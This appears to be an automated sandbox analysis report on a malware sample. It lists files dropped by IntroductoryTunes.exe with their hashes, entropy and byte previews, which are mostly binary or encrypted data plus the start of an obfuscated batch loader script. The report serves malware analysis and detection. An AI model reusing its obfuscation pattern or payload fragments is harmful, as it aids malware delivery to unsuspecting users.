Preview:	.p.E..A......u...,...W....G..M.+.PVW.u....E...P......M......M......E._^[..]....E...+......3..p.....A......A......A.....3.M..f......p...3..U....SV..W3.9~.tY.~..tS.M......j..E...P.......~:9~(~)..F ....D..+..M.M..E..E.P.[...G.[.;~(\|.F(_^[..]...3...V...<...3..F0.(...F..F..F..F .F$.F(.F,...F4. ..^.SV..~ .u/3..^ .^..^..^$.^(.^,......^..F0.(...F4. ..^[..v .'...Y..U..QSVW.......].S.3.....t9.A..~$.F..A..F..I.....3.j.Z.........Q.g....F 3.Y_^[..]....V0.E.QP.E.PQ..........F...t9.M.Q...U...Y.N..~$Wj...F...........@k..P.v....v.S.2...E..U..V.u........F..F..F..^]...V..3.j.Xj..f..Z.F..........Q....3..j.f......YY..t........F...^.3...U..S.].3.WPP.{.GW.3Ph........I..E...tGV3.j.Z.........Q.^...Y.u...VW.3j.h........I..M.HPj.V....V....Y^_[]....M........U....S..VW3..E..x..}..W...tI.E.....E.3.3.f..t,.E..}......P.E.E....f9E.t!C..._f..u..}...u..._^[..]........A..E.JF;.r...U..V.u....y.....j....t.@P.&...^]...j...U..SV.u.W....ts...tn.]...tg.O........V........E..w...V..CP.7..........3.

C:\Users\user\AppData\Local\Temp\Dolls

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.000708623969431
Encrypted:	false
SSDEEP:	1536:gvtmgMbFuPO1MBNfMBNB+usWjcdGQuklIusaAwu9hP/:6Ag0FuPOKBNEBNUGXEyaAt7P/
MD5:	51F439D0538F12CA3E88D6003DC34587
SHA1:	1EDA1627B83A32F4CB52D04DF2035DDA4DCAE5DC
SHA-256:	643A5B1FA0A8FDE540B26E7599753FB0C0542F93BB48A7D3755F555CAC4C21A0
SHA-512:	D92114D7095B6F53AFD8BEA9277E70F78991A74B92A6E52F925311E8EB3A7DA1B5CD2E169B928094DA6F0A7A1C9E5707A65430573D7C1C5EAB4752C98D6FB8D3
Malicious:	false
Preview:	@..?....@..?....@..?.....g.?.....E.?....@$.?.......?.......?.......?....@..?.......?.....b.?.....B.?.....$.?.......?....@..?.......?.......?.......?.....r.?....@U.?.....9.?.......?....@..?.......?.......?.......?....@..?.....{.?.....`.?.....G.?.....-.?.......?.......?....@..?.......?....@..?.......?....@..?.....i.?.....R.?.....;.?.....$.?.......?.......?....@..?.......?.......?....@..?.......?....@s.?....@^.?....@I.?....@4.?.......?....@..?.......?.......?.......?....@..?.......?....@..?.......?.....n.?.....[.?....@H.?.....5.?....@#.?.......?.......?.......?....@..?.......?.......?.......?....@..?....@..?....@s.?....@b.?.....Q.?.....A.?.....0.?....@ .?.......?.......?...........................a...?...F..<=..z1%.?..Vd.?E=....b..?.6..\.M=.......?p.9t^.<=..\c.N.?.....J=..3...?../...N=...b.?DZ....0=...Ohe.?.?...0=..]3...?....`$=.@...?X&eB.E=....rr.?\.3#..J=......?.....C5=..3:...?Ltm..YE=.@.'z+.?."e....=..tLVv.?p..$..M=.`.dH..?h6_~..(=.`x...?...Y.O=....YL.?wJ.Q.\C=...jU..?..V.

C:\Users\user\AppData\Local\Temp\Envelope

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	ASCII text, with very long lines (604), with CRLF line terminators
Category:	dropped
Size (bytes):	12188
Entropy (8bit):	5.166721280415063
Encrypted:	false
SSDEEP:	192:f41xMVG0yOGtTkyWqOsqiFshAoOMln6wRKjX23Bp+ZvUPe1UL3jaj7ptx9:f4yy/t7LzFSOe6wRgX23b+uFL3Wxf9
MD5:	A559BC0BDB013838BFEEFAE19D7A2655
SHA1:	6E5ACAD90BBB7A98532E46F75EB6852A727AE9B0
SHA-256:	6247B2F36DA0EE3D2E023A53D8AF952706B7F75A92160D7FD8452B5634F009A2
SHA-512:	9FFC977A8202AF31833D58CFF0544AB5A1775FE1C7303807653B4A45055C432E63FB422C4E576347A4FC679A4D6975DAAE8DA5DA17DC9E9978A0D1ADBC6F430A
Malicious:	false
Preview:	Set Silly=Y..bUbTourism-Shopper-Additions-Qui-Ira-Memories-..DSDeny-Prayers-Coupled-Boundary-Drama-Vb-..KRCarries-Systems-Providers-Participating-Liberty-Sacramento-Potential-Applications-..rEShell-Authentic-Usd-Sugar-Appear-Sail-..EYrBosnia-Constantly-..FwaMeet-Res-Arbitrary-..Set Eco=P..sxgComparable-Annex-Budgets-Yearly-Combining-Non-Contrary-..abAMolecular-..ldJRfc-Lauren-Jade-Zones-Produced-Scene-..BaWRepresentatives-..TBPermissions-Because-Batman-Select-Kinase-..VwlRobin-Rosa-Sink-Observation-Sagem-..LLSap-Constitutional-Compete-Few-Fans-Lets-..Set Andy=H..glEarned-Images-Columbus-Shapes-Much-..dStMen-Skins-..pfGZForth-Richards-Plain-Minolta-Credits-Specials-Ghost-Jewellery-Trust-..KupiAntenna-Makeup-Households-Announces-Excerpt-..TpMrPerson-Rescue-According-..BGcoIdeal-South-Quarters-Crude-Festivals-Holes-Booth-Little-Karaoke-..XYFolding-Surrounding-Pdt-Summaries-..Set Presently=/..tSgBiographies-..tjsButt-Workout-Boc-Study-Persons-Structured-Generators-Monaco-..laCFerry-Waiver-

C:\Users\user\AppData\Local\Temp\Envelope.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (604), with CRLF line terminators
Category:	dropped
Size (bytes):	12188
Entropy (8bit):	5.166721280415063
Encrypted:	false
SSDEEP:	192:f41xMVG0yOGtTkyWqOsqiFshAoOMln6wRKjX23Bp+ZvUPe1UL3jaj7ptx9:f4yy/t7LzFSOe6wRgX23b+uFL3Wxf9
MD5:	A559BC0BDB013838BFEEFAE19D7A2655
SHA1:	6E5ACAD90BBB7A98532E46F75EB6852A727AE9B0
SHA-256:	6247B2F36DA0EE3D2E023A53D8AF952706B7F75A92160D7FD8452B5634F009A2
SHA-512:	9FFC977A8202AF31833D58CFF0544AB5A1775FE1C7303807653B4A45055C432E63FB422C4E576347A4FC679A4D6975DAAE8DA5DA17DC9E9978A0D1ADBC6F430A
Malicious:	false
Preview:	Set Silly=Y..bUbTourism-Shopper-Additions-Qui-Ira-Memories-..DSDeny-Prayers-Coupled-Boundary-Drama-Vb-..KRCarries-Systems-Providers-Participating-Liberty-Sacramento-Potential-Applications-..rEShell-Authentic-Usd-Sugar-Appear-Sail-..EYrBosnia-Constantly-..FwaMeet-Res-Arbitrary-..Set Eco=P..sxgComparable-Annex-Budgets-Yearly-Combining-Non-Contrary-..abAMolecular-..ldJRfc-Lauren-Jade-Zones-Produced-Scene-..BaWRepresentatives-..TBPermissions-Because-Batman-Select-Kinase-..VwlRobin-Rosa-Sink-Observation-Sagem-..LLSap-Constitutional-Compete-Few-Fans-Lets-..Set Andy=H..glEarned-Images-Columbus-Shapes-Much-..dStMen-Skins-..pfGZForth-Richards-Plain-Minolta-Credits-Specials-Ghost-Jewellery-Trust-..KupiAntenna-Makeup-Households-Announces-Excerpt-..TpMrPerson-Rescue-According-..BGcoIdeal-South-Quarters-Crude-Festivals-Holes-Booth-Little-Karaoke-..XYFolding-Surrounding-Pdt-Summaries-..Set Presently=/..tSgBiographies-..tjsButt-Workout-Boc-Study-Persons-Structured-Generators-Monaco-..laCFerry-Waiver-

C:\Users\user\AppData\Local\Temp\Global

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	6106
Entropy (8bit):	7.971008971410884
Encrypted:	false
SSDEEP:	96:IA9EUb4082zhEHQ8QxP3bXdsOtnfLz9lnM1He7OI6TGBn8k+gsNA3zUcN+q7WM1P:I8EUb/WQDbWO3lntOID8zjkDlP
MD5:	6168E60423DD017F704F1E4EFF688884
SHA1:	CDECEFE1621338E922D9A9F1B8F2EF6C763A29C8
SHA-256:	755D0AD7AD3A95115B6A712FCDF560AA295D8461FA2B0FCC6FAA640D23BEE7EB
SHA-512:	E451156695D955407FBB3E423700BA243F32B6AB8B680A585832696BFFBEC48F8E14A7EC28DFFAF3824E1AE74D027B12346B453C264C20DFC8FFB1AB4EE627B5
Malicious:	false
Preview:	..&cW.CT....-L-...f9L;....^..-......Neo.cP..5.}".^....E.,L..)u...HS....\.6m]..F.V.yL.$.....y.3.-..d..V.W.<}:..yxo...Y0..h..I=.h....'[ip..F>...L\|fA......2.S.`g.......L...@6.a...J.....EEp_.....<..=.LP....[w..L.(Qs\|....<R...k..O".{n;tOpZ.l..ob...LA."ir..#m....7-:..Y.iO...].>H{5,.....y.Oeu}B......]9.(YA.KG...G..m%q.....g...[......//vt..q.P.@/>I*2........9..Ml.....l..8e_........>..W^E.j..Z4......b)........w....Q2Y......3.SCzj....Z..&.#.......V,.t7.<...~x.n.....-.$.\|..k....L...pv.}..E.+.9..\.......K..l3......b..C1C.5.......%.2.r...Rw`%lr/#......tS&.Tm.....v`<Ap~....FE........fP...>.5G(2.(..@....c.. ).B.F2.....>...d<m... ..\.&."..!...y.w%=..zG&.E.l.E...%........!.o...os..;......v.F.'...4i.-..s.Q..tw....=.X.........`.4=.a)....W.\|.Q.z..`%.4U.A......../..74.x..49=.U....1...T.6Y9.....S..c..h4................J,)....y.....=._.p.u\|..C....$.Xz.cn...0..-Y.'~`.'...U.8?k{._......6.0....gQ./...v....l..AHY.R...t.t..<]A..b/..7.....N.\|.. ....2....4t...

C:\Users\user\AppData\Local\Temp\Joined

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	6.345006765710798
Encrypted:	false
SSDEEP:	3072:Lvh8p65Nu+dVtqi/x4Rqf21Rgat0g/bZaZ:LJTDD/xcq21R1p/q
MD5:	EC8E0CED627C4151176085315170750C
SHA1:	BD1238CCCE2A52B853769EFDAF39C81C1FCDEC41
SHA-256:	75FC32D07E34F665F324A3CDAA90F27DFD7EF252A6C5356217F6EA55973DC620
SHA-512:	57A755D2C07951CD2A65F945FD0045CD351EFBAF9C9A4B9767A84A12D2A20C8D912EFB4911258189D1073D89EC332987CBFC9610D11E6B08C99231AD896B281D
Malicious:	false
Preview:	j.........M.PS.u.......x.............R.....t..~..u%...,....E....@..D...M...@.Ph.....p..._^[..]...U......\S.].VW...{..u.S.u..u..o....a...3..D$...I..D$H.t$..L$8.t$ .t$$.t$H.t$P.D$T.....D$..U....t$......uB.E....E..@......@.Ph............L$8.._...L$H......L$..#............]..U.j5...B....Yf9H.u..0.L$<._.....U..B...jGZ...f9P..U........A.....D$.PSR.......x..U..D$......B...j5...Xf9A.......jGXf9A...................t$8.L$\..\...D$...P.D$.P.D$`P.u..t$$.7......L$X....._...........E....E..@....f.x..........@...Pjr......p9t$<..^.....@.Ph...........A.....j..D$..D$,PSR.t$8.t$@.D$D.........x .E....@....f.x..t...@...Pjr.W....L$(.......K...f.\|$.A.......t$8.L$\..[...D$...P.D$.P.D$`P.u.V.M......L$X.....^....tl.D$....RtUHt5Ht"Ht..L$..D$(P....-.t$..L$,.$....:.L$..D$(P.......L$..D$(P.O....t$..L$,.S......t$..L$,....D$(P.L$..\....t$8.L$\.#[...D$...P.D$\P.u.......L$X...]...L$(....U.t$8.L$\..Z...D$...P.D$.P.D$`P.u..t$$.`......L$X....A]......6....t$..E...P.E.P.......L$8..]...L$H......L$..D..

C:\Users\user\AppData\Local\Temp\Lakes

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	6.647866237079595
Encrypted:	false
SSDEEP:	1536:ONvt5DfExgYR5yiPl/UQ6JP04vDcmrIEVJRa5oQyyk4qt1Fqnn:OGR5yiPlcQ4NvoWV7a5ouYNqnn
MD5:	C318F25155B6A942BB943224D23341DC
SHA1:	B0DE4CB3D56A299824EDF7A1755EDCF9A5E00B62
SHA-256:	C4DB2AA3C72A21802F9FB5C262312147626AF797B09AD642CE9882EE4CBD6939
SHA-512:	09787E9A3A6511506FA710EDEC80D30D903755999EA44E5C64999122219065C0833788A5FBDD5D2F87609782D8DD811D696F411F93F79F5CB569CFAD95FE76C5
Malicious:	false
Preview:	..\...7.E.j..E...x......X...j.V.E.P..x..V3.Sh.....7....I.j..E.PV..X....wx...E.+E..M..7.u.+....E..A...X...j..E..w....;u.......j.W.E.u.P..X....cx...E.WSh.....0....I.j..E.PW..X.....x...E.@u.F;u.~.;u..a.u.j.W.E.u.P..X.....x...E.WSh.....0....I.j..E.PW..X....w...E.@t.F;u.~.;u...+u....M...+....E.....X....Z.._^..[..]...U... SVW3...VVh.....0.E.....I....}..........]..M.[...l............t..E.Wj.h.....0....I....}...t~h..I..M..r..;.sN.}.V...Up..j\|Yf9.u..F...P.Bp..j\|Yf9.u%Q.M..o.....V...&p...M....P.~o..F;.r..}..M.E.PW........E...t.F;...b....M...v...._^[..]...U..S.].VWS.........t%3.9s.....I.t.Pj...PFj.h.....7...u.._^[]...U.......e..SV.u...W.}..M...E.F..E.F..E..F..E....k...........E.....Wj.h.....3....I..E...t~.~..t.h..K....Wr...}..t-j...L...P.u..0........j#.on....L.....P.&r.....E..PW.#....E..P..p..j..u...V.u..u..2.....u1.E..P.u..;}.t=Wj.h.....3....I..E.......I....E...M..su...M..ku...E._^[..]....~..t.h..K....q...}..t-j...L...P.u..p........j#.m....L.....P.fq...E..PW.c....E.

C:\Users\user\AppData\Local\Temp\Minutes

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	7.996058830818449
Encrypted:	true
SSDEEP:	768:zRKou5Ni06SRdWr2TkNXszIWxWf8Mr9IOpVTdZp0fBaPh7oK4JamffGOr0fpyMRX:zKzx6OdLkhTr9PrX2cp78f5Qkukepf
MD5:	489C35F2EA06AC86BB0288510EA754EB
SHA1:	0A6DF1519E39CE95EDF2EDA49C5F97B7C3AE99F3
SHA-256:	A1E7B53E757A4EB094896D2700B809889481D5F98543FE760809FDCF4667F31A
SHA-512:	9858AFC2514B30400C8C9642EEF9D4BFB2AC330F83D4A47F53BDD79138C76D1A60323643F00BE1DF8DC60E62976324801CA845518D7BA9A7D355F452E9CDF48C
Malicious:	false
Preview:	...._..QO.9.....'b.N...;5....e6.....f0..c.7..8.^6.....Q.U.R>.6/.Aw.mS7.].e...JZ..d...<.!..D...zKl'..&).......)x../.\<.U,.....O..7+.iH.N.:.>.RJ..8Q..m.~..']p.OYn...p)...p...+pY[..7.9.^...Tq........ .O[Y~....?.o1.......g.\|.G..E.....(2....(.C..QMC..8sB...^e4...v....&B.w.%J..K..$9_..H.m.k..KVA.....oy.....b.Tx.k.N.N...4..V..-..c...s./.....3.BA.r...2...O......HRg......,}.:..0.G3..A... ...l.....t...fS.k!...i.Ey...8U1sh...k....31.+.....9.w..o.'.%.._.;D.P..8....+{..W.I...Z.)...S}..o.v...V%.I.L.96q........D .;. a...E[i......\|'o!e<hC.f..R...6.....0..#..#.".-..w..KfkFHoq...E.../.....9.v.....FVA..;^.A..\81R..I!....QY.G._8...E......./..c......S.]..x.....C.KZ,J..,R..s.#..3Dj.A .eyQ.3e...O.."`x.AH.."....Cy..h..fc......b.[.<.]\|\@..X.?..-0W...]...HG."uB.T....A..q.U..d...(.i.[....b....g7.\.I......-c....UWi..e.....c.I.T..z1o....2.[..S......k....J9r.J:....O..c.X..5a...VMI..{....z.XF.2.......s\|BS...."=xILV..}...+........r.Y...[3.Ay........g.$.P..o...U.

C:\Users\user\AppData\Local\Temp\Os

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	82944
Entropy (8bit):	6.633288644142023
Encrypted:	false
SSDEEP:	1536:mq/qw0j8sgyZpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSljvj5q:mqGjLPQ6ClAMfA4lelIJBSLPy
MD5:	B047A83498AC9AA7B13ADD6FB729E5A8
SHA1:	FF7F36459CEB149D4BA074064E62978FDC78E595
SHA-256:	827B23AC598E76199D35199EAF6CBFD523015B926CE8097460B3D0435FD908B1
SHA-512:	EB8081E7670FB20B661DA3CE2D75EC94574A75A6460986DEC73F88D5E851135BDD6CA8D435F28DE17097BDABDD9DE4DFABB9369A6C47D70B704EF890EA2EB197
Malicious:	false
Preview:	L...D.......U...V.......N...........B...;...:...SSSSS3.3..........t............C...-PCRE...........S....M..E.P..........t/.}..\|..U..M...B.......}...........................h...;u..._..............f..f#......f;...@.............E..@...........u..v........u.....E..@..E...........M..I..M..{...9G........G........w....G.;...y..........n....E.........E.........E........=..........=...........l....................l..........0.w]t:......t..... .u_............3................f..4....s...3.................4........R.......@.t.....P...4.......................$...........".........^.....VUUU........;...3....Y...[.......P...gJ..............u..F.......E............@........f;.w......4..u.M.....\|........s..............KK..........y.I..A.....E.hJ.f...$?J.f......E..q........f;.w.........E....#.......................KK..........y.I..A.....E.hJ.f...$?J.f......E......}..........;...............t'.u.......R...P.....................5..\|......+.;.w&f..f;.4...u..........

C:\Users\user\AppData\Local\Temp\Proteins

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	142336
Entropy (8bit):	6.7392843535523195
Encrypted:	false
SSDEEP:	3072:qKJtIs8di/37EM/j2xQeixApVIa0/vid+:PtINsegA/12vk+
MD5:	7CAE9FD719A188D053159D065E8C155B
SHA1:	BD3FFD69D50555D13339F616B4964670B18C5CC9
SHA-256:	3C369F51E6104F04FECB51E94B7A55696A2E08C37104DA80C4609988EA1077E9
SHA-512:	A8D90A64D4C33B6B5EC45D37F671518E4C0D81DD68D8E7BA335308EBA74846BC4217C57CEDD46702EEEDBD34A95C70E25357A6286704542EC7C9297D08B1E01C
Malicious:	false
Preview:	/...V..[..V..R..V.s..V.ts..V.u.....^..l..U..E.SV.u.3.+......9u.W....#.v.....t.....C;.r._^[].U..V.u.3.....u.....t.....;u.r.^].j...i..Y.j..Nk..Y.j.hp.K...V..j...i..Y.e...=.QL...........QL......E...QL..}.........5PrL..58.I....]..tt.5LrL.....].}..}....}.;.rWj...d.I.9.t.;.rG.7...j...d.I......5PrL..58.I...E..5LrL...M.9M.u.9E.t..M..].E....h..I.h..I.....YYh..I.h..I.....YY.E...... ....}..u)...QL.....j..;j..Y.u..\....}..t.j..%j..Y...U...U..j.j..u.........].U..Vj..h..Y.5.QL...8.I..u.....d.I.j...QL...i..Y..^].U...5.QL...8.I...t..u...Y..t.3.@].3.].U..E...QL.].U..M...t....t..@W..........Y.....]..YL....YL.].U..QQ.}..V.U...M..U.Wt.j-Xf...........}..u.Sj.WRQ..t...M...E..]....v...W....0f.......w.r...u.}.3.f.....[f.....f.....f.....;.r._^..]...U..U.3....u.9E...\|.9E.s.3.@.M.P.u..u..J....E.].U..}...E.Vu...y.j.j...j..u..u.VP.......^].U..}...M.SV.u.Wt.j-Xf.......j...[..3..u...BW...w..B0f.....u.3.f..+.f.....f..+.f....;.r._^[]...U..U.V.u.W..:...+.u.+.f..t......:....+.t._^..y.

C:\Users\user\AppData\Local\Temp\Significantly

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	134144
Entropy (8bit):	5.236418676517609
Encrypted:	false
SSDEEP:	1536:J+l6JPTcUNx6/xhgariwYLTN3EfrDWyu0uZz:W6i/xhgariwYLTNaWy4Zz
MD5:	3E339F57DD088DE9E639BC8542E8D28B
SHA1:	58864FB112A65DCF469412926E410759C5CE415C
SHA-256:	74DE1C0D05C82207170D477B08DEFB47BFE83FE88AD3FAB7F135C525D2F1C4FE
SHA-512:	34F2FE5526750315F7667A2FB8F137EEBDFFAB908389E0F0F6203C918504B1C1313E7960585861A3D86A6C33B465F35024990C0F2EE2FDFAEBEA62B237B9F3C6
Malicious:	false
Preview:	..........................r.........r.r.r.r...........r...............................................................................................................................................................................................................................................................................r.r...r...............................................................................................................................................................................................................................k...........................................................................................+.+...............................................................r.r.r.............r.r.............r.r.............r.r.......r.r.r...............r...............r.............................r.r.,.,.,.,.,.,.,.,.,.,.,.,.r.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.r.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.r.,.,.r.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.

C:\Users\user\AppData\Local\Temp\Silk

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	7.997860469931
Encrypted:	true
SSDEEP:	1536:Owg/kLWb4kOWtIlxBehPlWGh1479LWD/we5w49oB88QpPgvCMH:124TDHBehPlThmWD12458QpGCMH
MD5:	08BCD342A4E756FBF01967761AFA64C2
SHA1:	3FF4835D3085804D789343F18744C0B39012022D
SHA-256:	689DAA041149BAB76E9FD4EDD1D1CE7875D2DE339159110D7A7F5C3BFDB275D7
SHA-512:	4750C139F876F2969A72C0BD8610B13CCB0278B691CBB2417D6AC5C0B4B974EF6C1682201CA51BA73F913864EF99900081BD35BF989EF75EB8B7ECD351912D18
Malicious:	false
Preview:	.+..3V.Zs..x...]GE?...8.....J..%...._.P.&....8..3.h..?'....I..b'..L.JR_......a...qW.f.b3.....z.=._..?..P..dJ ...=..I....+J..D..B.)I...7..{.d.X@.).)CXJX:wj...{.G;........cE..6n.:T...).......W.0O..LN...)..7.^.'..u.].2.vo...."[.._.....k..bSx...../M.g;..?J.P...U....`....3.~g.1w.b...b..F..!...\h.T%.;'i'a../f..i.......2EV.K"B.YO<<@l.02.Do%.`.........>..]<.R.NaX......}......<..k..t......I........bQY.c...I..q...k.....O.q..]9..R..T...E^..b.$u-...Suy..2.zM.......If..ZZ.2.U9W`.....h.9.W.57h..KV\|U>g.<bo..k.F.ZX..X..m.K...sH....d..r..m.r.`....b..F.N0..-...H%.<1.\\8.b.....R..u74......Z...._....6.T...Iq.6...k......r0.dX...K.@-....L%.C.i../.(vu..B.O.......X......Y..@.y+.Ggi...)..X.{.O)i.....;.a3...M....r.....-.t.....Ox...%W..D....Y.5..'...hIg+G,.... .~..Q[.}....j.&.....-.]R......%.........0..\{sw.......$9..\..A]hJ.J...n.9.#.Q..mV}...m.B......s.i.R...{......:.!..\..........5........0...7.y.....D.Y......>04q8i... .....H.h.d)J...IU....z.&....

C:\Users\user\AppData\Local\Temp\Sophisticated

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	48868
Entropy (8bit):	6.8377073599805005
Encrypted:	false
SSDEEP:	768:k2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCwqVLwQVn8qT4O:k2+9BBVgCOa1ZBPaPQaEwo0yv
MD5:	C90E4CEAF964184FCC7248E9EB56B364
SHA1:	3215F357A036660C4FE5CE3E9EC37476FE8C0E47
SHA-256:	4A52319DDEA00E3608E0D07BD992FBBD9ABD39E76A7B8EAA818BEE3F409FAED2
SHA-512:	D9928CA850EBCE5753B95AC7D35EE32C23EEAC031115B99401434D3CCFEE5E0412F3B08B02B20E2CDBB65EC5D7D218370C17BCF826EF1F1C9A21153C495DF41A
Malicious:	false
Preview:	......i...]...]...]...]...]...]...]...]...]...]...].......................W..........................b...]...]...]...]...]...]...]...]...]...]...]...b...............................................]...]...]...]...]...]...]...]...]...]...]...a......................................................]...]...]...]...]...]...]...]...]...]...]...]...v......................................]...]...]...]...]...]...]...]...]...]...]...]....................................k......................^...]...]...]...]...]...]...]...]...]...]...]...]..................................d...]...]...]...]...]...]...]...]...]...]...]...^........................k.....................................]...]...]...]...]...]...]...]...]...]...]...]...^...........................v...]...]...]...]...]...]...]...]...]...]...]...]...................................................................e...]...]...]...]...]...]...]...]...]...]...]...]...^.................l...]...]...]...]...]...]...]...]...]...]...]...].

C:\Users\user\AppData\Local\Temp\Steady

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.997159583218442
Encrypted:	true
SSDEEP:	1536:EPOv0Cj7oaumcn8sY0X93u6C4j9MDXTEiWhzrW7U:eOT0aY8ENe6C4j9yUzqo
MD5:	61BF3D8ED395253BB3360FF6D7A3E13F
SHA1:	FE461FA8EDC7E6A4F0C415A27F11B0D0F4C3C794
SHA-256:	F1D821B04A7AB3C9F994816F724E8D657AFAB805BA2063783AF432E2DF772AA4
SHA-512:	9DF0933550A179E2763CE6F98B67BBC7E0FE0AE45A23B3DB62408B33C3CF5C951B3B3443C032FF8AC92BA4F5B199B82DCA304B1EE369291ACB2C8D18DFEDDFD8
Malicious:	false
Preview:	9X...n....\|...1.H......0...d^L.E%.x...u....C.Cm...[Q.)w..=...J5...FS'~...l.....hc...Mx..x...P....&b...'m..Qd..#_"xE......(.R.........5uNrB'.:.j..g..;,..l.....P}..Y...{....{g\..C."..T..V..3.S.%J...N"XH^(u.=.5.2=..[=fM.._j.k.c.V.z..d!A.T\..Po#.E. ..{.6........\.t...n./...jK.....}..^S=a...h...l..I$q(.Y....LU:Z....,!C.F.y..G....B.U...a).vvzS..s.o....+.......n.../.$\|.....,...O..o..=Oa.........P;....m...\Y...[...............l..t...\|@.Sa.uy..[.3...a.... ...V.......<....@..c....o..s\..s.p..G$..k....2:.LG.X..7.&.F.T%...1X....&..4.E..Z.n.q....Q.!.@4.c....C..+...p.ok.........Mj.....{....sOF.....&..T.0MB..~...V"......[k.r.W.y...&.a......!.f...$.j..W.2K.m...T.K...w.gP.X^.....2+...m........"...=Ydv]..s...]...tF..jm...utU6....ot..U..f...;.A...{}..@...)yH}A..w.E.:.q.f..:..)..Dm&.3...,g..q...?....@.N.....e..5\|.P.....U...?@vS........Ymq.....;X?s<.A<&2j...g[7BN.\.x.x/.g@.xT.).....,.\..BI&u...S... .a..1..v.._..[5,!<.'....Ca.$..........a}.+.J...'.H..9....y.

C:\Users\user\AppData\Local\Temp\Sunny

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	6.484312007221624
Encrypted:	false
SSDEEP:	1536:n6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNpv:6CV26MqgQTc5F446iYNpv
MD5:	ACF71488AD559B0805C09C7784EF33BC
SHA1:	D85704E0785BF074CEA27064ECFAD879E977FB68
SHA-256:	B71942E4038CCEBF44CA85D6C80B04972D2012B055C87FE31D8F1D1AEF2199DE
SHA-512:	2C7AE4186A472C0B3B26F03A2A313C12F6FE2BA36379238199BF1587DEFE842E31437190E2F8707A8DD731A0DF5F3DEF8B4BDB699383C7B50E12F17FF0D0098B
Malicious:	false
Preview:	DEALERPICRESPONDEDCOURAGEPREREQUISITEOLYMPUSDIAGRAMENGAGED..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B....................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ts

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.998265171244121
Encrypted:	true
SSDEEP:	3072:XfqWWE1encXmMgX+jUGvbetYY4i6lQlrXM:yWf4neTgXYPuumO
MD5:	41AD9045ADEB9B118810F105CDD55AB5
SHA1:	6A4CEA254D51D6179B88EA528576A27AD50F2A66
SHA-256:	6091CC2DA7AC62A2CE000CEFE52C10F61D701E6FF36757FFA0D9471DD3215490
SHA-512:	B8D7BC4295BD3530A4CA9F3DCBE7F1D2FCB23D4DF7D8B95F2E29CD6625ACC6F030E929D4788C0A874E7F6D251BA031DE4E2021A84ACD50C8F71F0DCD43319F3C
Malicious:	false
Preview:	.Md.B.7......:.gN...af.....5.7'.p.D4..Ly.}..\|.h.j..T>..=[...#.K..v.Q..........A.".h:....1....f.'M..y4...O.pQm.._..(Q.p..=g.p.....zg._5S6....w......~;vI....4....j..+..@.9.L.[......a....+..].9.d..r.,...0Ub.R.=..@..'....S.g1z.R.y.j....]..F.[..%a.......M.Z.1.a......P....UU....u"....(O \|...n.8SUIit}c.V.......>..... R0.b..2..k.`.i.`..TI}...$,...M.......P..Y...H........w.=&....qt.9....}...K.5G...O.6....nC...<....O.y..%j...O<Dc..oV$.....)T1_m...T.6..S.9.xN.J...Bb....5H.#0R...6.J.5...=E.. ]>.....\|f..p6..',...z.kQ....+....(...=......d.)..@.~..@ .=.8...#..#..c... ...y.c..{..g.........,..m.>.....!M.8...".......x.aOB..t..@.Fm{'.w.(yD.S.l.:.S.7..3..{p....lYe.F...T_Q...\|.!r..).bC.z......k........i....\|?\|....ylF..m4g......m............;}N.7..c{....q......8v..'..RH>qm.{.Y9~U..+...&....l9.8.}&r..a.i.{....<N.N2&H<..@..{k..W.......s..0:.bU.!.......{...e.".Y.*.?X.F.O!V..LWo....>........V.1..><.....,.f..{S..x...d....(..d....j .RW.i.w.......C.......L.....(~..ja.

C:\Users\user\AppData\Local\Temp\Unnecessary

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	GTA2 binary mission script (SCR), Residential area (ste)
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.997215216862457
Encrypted:	true
